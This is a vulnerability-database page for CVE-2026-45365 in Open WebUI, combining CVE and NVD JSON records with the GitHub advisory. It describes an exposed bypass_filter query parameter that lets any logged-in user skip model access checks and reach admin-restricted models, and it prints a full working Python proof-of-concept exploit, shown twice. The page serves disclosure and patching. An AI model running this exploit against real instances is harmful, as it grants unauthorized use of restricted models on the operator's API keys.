Vulnerability-Lookup

CVE-2026-45365 (GCVE-0-2026-45365)

Vulnerability from cvelistv5 – Published: 2026-05-15 21:07 – Updated: 2026-05-19 12:27

Title

Open WebUI: Authenticated users can bypass model access control via exposed query parameter

Summary

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, an internal-only bypass_filter parameter is exposed on the /openai/chat/completions and /ollama/api/chat HTTP endpoints via FastAPI query string binding, allowing any authenticated user to append ?bypass_filter=true and bypass model access control checks to invoke admin-restricted models. This vulnerability is fixed in 0.8.11.

Severity ?

5.4 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CWE

CWE-285 - Improper Authorization

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/open-webui/open-webui/security…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
open-webui	open-webui	Affected: < 0.8.11

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-45365",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-19T12:26:51.420869Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-19T12:27:12.309Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "open-webui",
          "vendor": "open-webui",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.8.11"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, an internal-only bypass_filter parameter is exposed on the /openai/chat/completions and /ollama/api/chat HTTP endpoints via FastAPI query string binding, allowing any authenticated user to append ?bypass_filter=true and bypass model access control checks to invoke admin-restricted models. This vulnerability is fixed in 0.8.11."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-285",
              "description": "CWE-285: Improper Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-15T21:07:12.449Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m"
        }
      ],
      "source": {
        "advisory": "GHSA-v6qf-75pr-p96m",
        "discovery": "UNKNOWN"
      },
      "title": "Open WebUI: Authenticated users can bypass model access control via exposed query parameter"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-45365",
    "datePublished": "2026-05-15T21:07:12.449Z",
    "dateReserved": "2026-05-12T00:51:29.085Z",
    "dateUpdated": "2026-05-19T12:27:12.309Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-45365",
      "date": "2026-05-24",
      "epss": "0.0003",
      "percentile": "0.0886"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-45365\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-15T22:16:55.590\",\"lastModified\":\"2026-05-19T14:16:46.033\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, an internal-only bypass_filter parameter is exposed on the /openai/chat/completions and /ollama/api/chat HTTP endpoints via FastAPI query string binding, allowing any authenticated user to append ?bypass_filter=true and bypass model access control checks to invoke admin-restricted models. This vulnerability is fixed in 0.8.11.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":2.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-285\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.8.11\",\"matchCriteriaId\":\"5075875A-B6AB-4CC6-BA97-9C1D7E130C20\"}]}]}],\"references\":[{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Patch\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Patch\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-45365\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-19T12:26:51.420869Z\"}}}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-19T12:26:41.963Z\"}}], \"cna\": {\"title\": \"Open WebUI: Authenticated users can bypass model access control via exposed query parameter\", \"source\": {\"advisory\": \"GHSA-v6qf-75pr-p96m\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"open-webui\", \"product\": \"open-webui\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.8.11\"}]}], \"references\": [{\"url\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m\", \"name\": \"https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, an internal-only bypass_filter parameter is exposed on the /openai/chat/completions and /ollama/api/chat HTTP endpoints via FastAPI query string binding, allowing any authenticated user to append ?bypass_filter=true and bypass model access control checks to invoke admin-restricted models. This vulnerability is fixed in 0.8.11.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-285\", \"description\": \"CWE-285: Improper Authorization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-15T21:07:12.449Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-45365\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-19T12:27:12.309Z\", \"dateReserved\": \"2026-05-12T00:51:29.085Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-15T21:07:12.449Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-45365

Vulnerability from fkie_nvd - Published: 2026-05-15 22:16 - Updated: 2026-05-19 14:16

Severity ?

5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m	Exploit, Patch, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m	Exploit, Patch, Vendor Advisory

Impacted products

	Vendor	Product	Version
	openwebui	open_webui	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5075875A-B6AB-4CC6-BA97-9C1D7E130C20",
              "versionEndExcluding": "0.8.11",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, an internal-only bypass_filter parameter is exposed on the /openai/chat/completions and /ollama/api/chat HTTP endpoints via FastAPI query string binding, allowing any authenticated user to append ?bypass_filter=true and bypass model access control checks to invoke admin-restricted models. This vulnerability is fixed in 0.8.11."
    }
  ],
  "id": "CVE-2026-45365",
  "lastModified": "2026-05-19T14:16:46.033",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-15T22:16:55.590",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-285"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-V6QF-75PR-P96M

Vulnerability from github – Published: 2026-05-14 20:25 – Updated: 2026-05-19 16:00

Summary

Open WebUI: Authenticated users can bypass model access control via exposed query parameter [AI-ASSISTED]

Details

Summary

An internal-only bypass_filter parameter is exposed on the /openai/chat/completions and /ollama/api/chat HTTP endpoints via FastAPI query string binding, allowing any authenticated user to append ?bypass_filter=true and bypass model access control checks to invoke admin-restricted models.

Details

The generate_chat_completion route handlers in both routers/openai.py and routers/ollama.py declare bypass_filter as a function parameter:

routers/openai.py, line 937–941:

@router.post("/chat/completions")
async def generate_chat_completion(
    request: Request,
    form_data: dict,
    user=Depends(get_verified_user),
    bypass_filter: Optional[bool] = False,
    ...
):

routers/ollama.py, line 1283–1288:

@router.post("/api/chat")
async def generate_chat_completion(
    ...
    bypass_filter: Optional[bool] = False,
    ...
):

Because FastAPI automatically binds unrecognized function parameters to the query string, any HTTP client can set this value by appending ?bypass_filter=true to the request URL.

When bypass_filter is true, the access control check is skipped entirely:

routers/openai.py, line 980:

if not bypass_filter and user.role == "user":
    # ACL check — skipped when bypass_filter is True

This parameter is intended for internal use only — the server-side chat pipeline in utils/chat.py (lines 238, 253) passes bypass_filter=True as a Python function argument when making recursive calls to base models that have already been authorized. However, because it appears in the HTTP handler's signature, it is unintentionally exposed to external callers.

This is separate from the BYPASS_MODEL_ACCESS_CONTROL environment variable, which is a deliberate admin setting for trusted environments.

PoC

#!/usr/bin/env python3
"""
uv run --no-project --with requests finding_02_bypass_filter_acl_bypass.py [--base-url http://localhost:8089]

Finding #2 — Unauthorized model access via bypass_filter query parameter

SUMMARY:
  The POST /openai/chat/completions and POST /ollama/api/chat endpoints expose
  a bypass_filter query parameter as part of their FastAPI function signatures.
  FastAPI automatically binds this to the query string. When an authenticated
  user appends ?bypass_filter=true, the access control check is skipped:

    if not bypass_filter and user.role == "user":
        check_model_access(user, model)  # <-- skipped when bypass_filter=True

  This allows any authenticated user to invoke models they are not authorized
  to use, including admin-restricted models.

VULNERABLE CODE:
  backend/open_webui/routers/openai.py, line 941 + 980:
    async def generate_chat_completion(..., bypass_filter: Optional[bool] = False, ...):
        ...
        if not bypass_filter and user.role == "user":
            # ACL check — skipped when bypass_filter=True

  backend/open_webui/routers/ollama.py, line 1288 + 1339:
    async def generate_chat_completion(..., bypass_filter: Optional[bool] = False, ...):
        ...
        if not bypass_filter and user.role == "user":
            # ACL check — skipped when bypass_filter=True

IMPACT:
  Any authenticated user can bypass model access control on both OpenAI and
  Ollama proxy endpoints. Because bypass_filter skips the ACL check but still
  routes through the server-side LLM connection, the attacker can invoke
  admin-restricted models using the server's API keys and receive actual LLM
  responses — effectively gaining free, unauthorized access to any configured
  model.

REPRODUCTION:
  1. Create a restricted model with empty access_grants (admin-only).
  2. Authenticate as a regular user.
  3. POST /openai/chat/completions with the restricted model → expect 403.
  4. POST /openai/chat/completions?bypass_filter=true → request succeeds.

REQUIREMENTS:
  - Running Open WebUI instance with Ollama or OpenAI backend configured
  - A model with restricted access_grants
  - An authenticated user who is NOT granted access to that model
"""

import argparse
import sys
import requests


def main():
    parser = argparse.ArgumentParser(description="Finding #2: bypass_filter ACL bypass")
    parser.add_argument("--base-url", required=True, help="Open WebUI base URL")
    parser.add_argument("--attacker-email", required=True)
    parser.add_argument("--attacker-password", required=True)
    parser.add_argument("--admin-email", required=True)
    parser.add_argument("--admin-password", required=True)
    args = parser.parse_args()

    base = args.base_url.rstrip("/")

    # ── Step 1: Authenticate ──
    print("[*] Authenticating as attacker...")
    r = requests.post(f"{base}/api/v1/auths/signin",
                      json={"email": args.attacker_email, "password": args.attacker_password})
    if not r.ok:
        print(f"[-] Login failed: {r.status_code}")
        sys.exit(1)
    attacker_token = r.json()["token"]
    print(f"[+] Logged in as attacker (id={r.json()['id']})")

    # ── Step 2: Find restricted model via admin ──
    print("[*] Authenticating as admin to find restricted model...")
    r = requests.post(f"{base}/api/v1/auths/signin",
                      json={"email": args.admin_email, "password": args.admin_password})
    if not r.ok:
        print(f"[-] Admin login failed: {r.status_code}")
        sys.exit(1)
    admin_token = r.json()["token"]

    r = requests.get(f"{base}/api/v1/models", headers={"Authorization": f"Bearer {admin_token}"})
    if not r.ok:
        print(f"[-] Failed to list models: {r.status_code}")
        sys.exit(1)

    models = r.json()
    if isinstance(models, dict):
        models = models.get("data", models.get("models", []))

    restricted_model_id = None
    base_model_id = None
    for m in models:
        info = m.get("info", {})
        if not info:
            continue
        access_grants = info.get("access_grants", None)
        if access_grants is not None and len(access_grants) == 0 and info.get("base_model_id"):
            restricted_model_id = m["id"]
            base_model_id = info.get("base_model_id")
            print(f"[+] Found restricted model: {restricted_model_id} (base: {base_model_id})")
            break

    if not restricted_model_id:
        print("[-] No restricted model found.")
        sys.exit(1)

    headers = {"Authorization": f"Bearer {attacker_token}"}
    payload = {
        "model": restricted_model_id,
        "messages": [{"role": "user", "content": "Say exactly: BYPASS_CONFIRMED"}],
        "stream": False,
    }

    # ── Step 3: Confirm access is denied on /openai/chat/completions ──
    print(f"\n[*] Step 1: POST /openai/chat/completions (no bypass) with model '{restricted_model_id}'...")
    r = requests.post(f"{base}/openai/chat/completions", headers=headers, json=payload)
    print(f"    Response: {r.status_code} {r.text[:200]}")

    if r.status_code == 403:
        print("[+] Access correctly DENIED (403) — attacker cannot use the restricted model")
    else:
        print(f"[!] Unexpected response code {r.status_code} (expected 403)")

    # ── Step 4: Bypass with ?bypass_filter=true on OpenAI endpoint ──
    print(f"\n[*] Step 2: POST /openai/chat/completions?bypass_filter=true ...")
    r = requests.post(f"{base}/openai/chat/completions",
                      headers=headers, json=payload,
                      params={"bypass_filter": "true"})
    print(f"    Response: {r.status_code} {r.text[:300]}")

    openai_bypassed = r.status_code != 403

    if openai_bypassed:
        print(f"[+] OpenAI endpoint: ACL BYPASSED (got {r.status_code} instead of 403)")
    else:
        print(f"[-] OpenAI endpoint: bypass did not work (still 403)")

    # ── Step 5: Also test Ollama endpoint ──
    print(f"\n[*] Step 3: POST /ollama/api/chat?bypass_filter=true ...")
    ollama_payload = {
        "model": restricted_model_id,
        "messages": [{"role": "user", "content": "Say exactly: BYPASS_CONFIRMED"}],
        "stream": False,
    }
    r_normal = requests.post(f"{base}/ollama/api/chat", headers=headers, json=ollama_payload)
    print(f"    Without bypass: {r_normal.status_code} {r_normal.text[:150]}")

    r_bypass = requests.post(f"{base}/ollama/api/chat", headers=headers, json=ollama_payload,
                             params={"bypass_filter": "true"})
    print(f"    With bypass:    {r_bypass.status_code} {r_bypass.text[:150]}")

    ollama_bypassed = r_normal.status_code == 403 and r_bypass.status_code != 403

    if ollama_bypassed:
        print(f"[+] Ollama endpoint: ACL BYPASSED ({r_normal.status_code} → {r_bypass.status_code})")
    elif r_bypass.status_code != 403:
        print(f"[+] Ollama endpoint: bypass_filter accepted (status {r_bypass.status_code})")
        ollama_bypassed = True
    else:
        print(f"[-] Ollama endpoint: bypass did not work")

    # ── Results ──
    if openai_bypassed or ollama_bypassed:
        print(f"\n[+] SUCCESS: bypass_filter query parameter bypasses model access control!")
        print(f"    OpenAI endpoint (/openai/chat/completions): {'BYPASSED' if openai_bypassed else 'not bypassed'}")
        print(f"    Ollama endpoint (/ollama/api/chat):          {'BYPASSED' if ollama_bypassed else 'not bypassed'}")
        print(f"")
        print(f"    Any authenticated user can append ?bypass_filter=true to skip")
        print(f"    check_model_access() and use admin-restricted models via the")
        print(f"    server's own API keys.")
        sys.exit(0)
    else:
        print(f"\n[-] FAILED: bypass_filter did not bypass access control on either endpoint")
        sys.exit(1)


if __name__ == "__main__":
    main()

Impact

Any authenticated user (including those with the lowest "user" role) can invoke any model configured on the server, regardless of access control settings. This bypasses the admin's ability to restrict which models are available to which users — for example, limiting expensive models to specific teams or keeping certain models internal-only.

Resolution

Fixed in commit c0385f60b, first released in v0.8.11 (Mar 2026) — one day after this report.

bypass_filter is no longer a function parameter on either route handler. Both routers/openai.py and routers/ollama.py now read it via getattr(request.state, 'bypass_filter', False). Because request.state can only be populated by server-side code in the same process (typically utils/chat.py when recursing into a base model the caller is already authorized for), external HTTP clients cannot set it via query string, body, or any other transport-level mechanism. Appending ?bypass_filter=true to the URL has no effect — the query parameter is now silently ignored by FastAPI since it doesn't bind to any handler argument.

Users on >= 0.8.11 are not affected.

Severity ?

5.4 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.10"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45365"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:25:24Z",
    "nvd_published_at": "2026-05-15T22:16:55Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nAn internal-only bypass_filter parameter is exposed on the /openai/chat/completions and /ollama/api/chat HTTP endpoints via FastAPI query string binding, allowing any authenticated user to append ?bypass_filter=true and bypass model access control checks to invoke admin-restricted models.\n\n### Details\n\nThe `generate_chat_completion` route handlers in both `routers/openai.py` and `routers/ollama.py` declare `bypass_filter` as a function parameter:\n\n**`routers/openai.py`, line 937\u2013941:**\n\n```python\n@router.post(\"/chat/completions\")\nasync def generate_chat_completion(\n    request: Request,\n    form_data: dict,\n    user=Depends(get_verified_user),\n    bypass_filter: Optional[bool] = False,\n    ...\n):\n```\n\n**`routers/ollama.py`, line 1283\u20131288:**\n\n```python\n@router.post(\"/api/chat\")\nasync def generate_chat_completion(\n    ...\n    bypass_filter: Optional[bool] = False,\n    ...\n):\n```\n\nBecause FastAPI automatically binds unrecognized function parameters to the query string, any HTTP client can set this value by appending `?bypass_filter=true` to the request URL.\n\nWhen `bypass_filter` is true, the access control check is skipped entirely:\n\n**`routers/openai.py`, line 980:**\n\n```python\nif not bypass_filter and user.role == \"user\":\n    # ACL check \u2014 skipped when bypass_filter is True\n```\n\nThis parameter is intended for internal use only \u2014 the server-side chat pipeline in `utils/chat.py` (lines 238, 253) passes `bypass_filter=True` as a Python function argument when making recursive calls to base models that have already been authorized. However, because it appears in the HTTP handler\u0027s signature, it is unintentionally exposed to external callers.\n\nThis is separate from the `BYPASS_MODEL_ACCESS_CONTROL` environment variable, which is a deliberate admin setting for trusted environments.\n\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nuv run --no-project --with requests finding_02_bypass_filter_acl_bypass.py [--base-url http://localhost:8089]\n\nFinding #2 \u2014 Unauthorized model access via bypass_filter query parameter\n\nSUMMARY:\n  The POST /openai/chat/completions and POST /ollama/api/chat endpoints expose\n  a bypass_filter query parameter as part of their FastAPI function signatures.\n  FastAPI automatically binds this to the query string. When an authenticated\n  user appends ?bypass_filter=true, the access control check is skipped:\n\n    if not bypass_filter and user.role == \"user\":\n        check_model_access(user, model)  # \u003c-- skipped when bypass_filter=True\n\n  This allows any authenticated user to invoke models they are not authorized\n  to use, including admin-restricted models.\n\nVULNERABLE CODE:\n  backend/open_webui/routers/openai.py, line 941 + 980:\n    async def generate_chat_completion(..., bypass_filter: Optional[bool] = False, ...):\n        ...\n        if not bypass_filter and user.role == \"user\":\n            # ACL check \u2014 skipped when bypass_filter=True\n\n  backend/open_webui/routers/ollama.py, line 1288 + 1339:\n    async def generate_chat_completion(..., bypass_filter: Optional[bool] = False, ...):\n        ...\n        if not bypass_filter and user.role == \"user\":\n            # ACL check \u2014 skipped when bypass_filter=True\n\nIMPACT:\n  Any authenticated user can bypass model access control on both OpenAI and\n  Ollama proxy endpoints. Because bypass_filter skips the ACL check but still\n  routes through the server-side LLM connection, the attacker can invoke\n  admin-restricted models using the server\u0027s API keys and receive actual LLM\n  responses \u2014 effectively gaining free, unauthorized access to any configured\n  model.\n\nREPRODUCTION:\n  1. Create a restricted model with empty access_grants (admin-only).\n  2. Authenticate as a regular user.\n  3. POST /openai/chat/completions with the restricted model \u2192 expect 403.\n  4. POST /openai/chat/completions?bypass_filter=true \u2192 request succeeds.\n\nREQUIREMENTS:\n  - Running Open WebUI instance with Ollama or OpenAI backend configured\n  - A model with restricted access_grants\n  - An authenticated user who is NOT granted access to that model\n\"\"\"\n\nimport argparse\nimport sys\nimport requests\n\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"Finding #2: bypass_filter ACL bypass\")\n    parser.add_argument(\"--base-url\", required=True, help=\"Open WebUI base URL\")\n    parser.add_argument(\"--attacker-email\", required=True)\n    parser.add_argument(\"--attacker-password\", required=True)\n    parser.add_argument(\"--admin-email\", required=True)\n    parser.add_argument(\"--admin-password\", required=True)\n    args = parser.parse_args()\n\n    base = args.base_url.rstrip(\"/\")\n\n    # \u2500\u2500 Step 1: Authenticate \u2500\u2500\n    print(\"[*] Authenticating as attacker...\")\n    r = requests.post(f\"{base}/api/v1/auths/signin\",\n                      json={\"email\": args.attacker_email, \"password\": args.attacker_password})\n    if not r.ok:\n        print(f\"[-] Login failed: {r.status_code}\")\n        sys.exit(1)\n    attacker_token = r.json()[\"token\"]\n    print(f\"[+] Logged in as attacker (id={r.json()[\u0027id\u0027]})\")\n\n    # \u2500\u2500 Step 2: Find restricted model via admin \u2500\u2500\n    print(\"[*] Authenticating as admin to find restricted model...\")\n    r = requests.post(f\"{base}/api/v1/auths/signin\",\n                      json={\"email\": args.admin_email, \"password\": args.admin_password})\n    if not r.ok:\n        print(f\"[-] Admin login failed: {r.status_code}\")\n        sys.exit(1)\n    admin_token = r.json()[\"token\"]\n\n    r = requests.get(f\"{base}/api/v1/models\", headers={\"Authorization\": f\"Bearer {admin_token}\"})\n    if not r.ok:\n        print(f\"[-] Failed to list models: {r.status_code}\")\n        sys.exit(1)\n\n    models = r.json()\n    if isinstance(models, dict):\n        models = models.get(\"data\", models.get(\"models\", []))\n\n    restricted_model_id = None\n    base_model_id = None\n    for m in models:\n        info = m.get(\"info\", {})\n        if not info:\n            continue\n        access_grants = info.get(\"access_grants\", None)\n        if access_grants is not None and len(access_grants) == 0 and info.get(\"base_model_id\"):\n            restricted_model_id = m[\"id\"]\n            base_model_id = info.get(\"base_model_id\")\n            print(f\"[+] Found restricted model: {restricted_model_id} (base: {base_model_id})\")\n            break\n\n    if not restricted_model_id:\n        print(\"[-] No restricted model found.\")\n        sys.exit(1)\n\n    headers = {\"Authorization\": f\"Bearer {attacker_token}\"}\n    payload = {\n        \"model\": restricted_model_id,\n        \"messages\": [{\"role\": \"user\", \"content\": \"Say exactly: BYPASS_CONFIRMED\"}],\n        \"stream\": False,\n    }\n\n    # \u2500\u2500 Step 3: Confirm access is denied on /openai/chat/completions \u2500\u2500\n    print(f\"\\n[*] Step 1: POST /openai/chat/completions (no bypass) with model \u0027{restricted_model_id}\u0027...\")\n    r = requests.post(f\"{base}/openai/chat/completions\", headers=headers, json=payload)\n    print(f\"    Response: {r.status_code} {r.text[:200]}\")\n\n    if r.status_code == 403:\n        print(\"[+] Access correctly DENIED (403) \u2014 attacker cannot use the restricted model\")\n    else:\n        print(f\"[!] Unexpected response code {r.status_code} (expected 403)\")\n\n    # \u2500\u2500 Step 4: Bypass with ?bypass_filter=true on OpenAI endpoint \u2500\u2500\n    print(f\"\\n[*] Step 2: POST /openai/chat/completions?bypass_filter=true ...\")\n    r = requests.post(f\"{base}/openai/chat/completions\",\n                      headers=headers, json=payload,\n                      params={\"bypass_filter\": \"true\"})\n    print(f\"    Response: {r.status_code} {r.text[:300]}\")\n\n    openai_bypassed = r.status_code != 403\n\n    if openai_bypassed:\n        print(f\"[+] OpenAI endpoint: ACL BYPASSED (got {r.status_code} instead of 403)\")\n    else:\n        print(f\"[-] OpenAI endpoint: bypass did not work (still 403)\")\n\n    # \u2500\u2500 Step 5: Also test Ollama endpoint \u2500\u2500\n    print(f\"\\n[*] Step 3: POST /ollama/api/chat?bypass_filter=true ...\")\n    ollama_payload = {\n        \"model\": restricted_model_id,\n        \"messages\": [{\"role\": \"user\", \"content\": \"Say exactly: BYPASS_CONFIRMED\"}],\n        \"stream\": False,\n    }\n    r_normal = requests.post(f\"{base}/ollama/api/chat\", headers=headers, json=ollama_payload)\n    print(f\"    Without bypass: {r_normal.status_code} {r_normal.text[:150]}\")\n\n    r_bypass = requests.post(f\"{base}/ollama/api/chat\", headers=headers, json=ollama_payload,\n                             params={\"bypass_filter\": \"true\"})\n    print(f\"    With bypass:    {r_bypass.status_code} {r_bypass.text[:150]}\")\n\n    ollama_bypassed = r_normal.status_code == 403 and r_bypass.status_code != 403\n\n    if ollama_bypassed:\n        print(f\"[+] Ollama endpoint: ACL BYPASSED ({r_normal.status_code} \u2192 {r_bypass.status_code})\")\n    elif r_bypass.status_code != 403:\n        print(f\"[+] Ollama endpoint: bypass_filter accepted (status {r_bypass.status_code})\")\n        ollama_bypassed = True\n    else:\n        print(f\"[-] Ollama endpoint: bypass did not work\")\n\n    # \u2500\u2500 Results 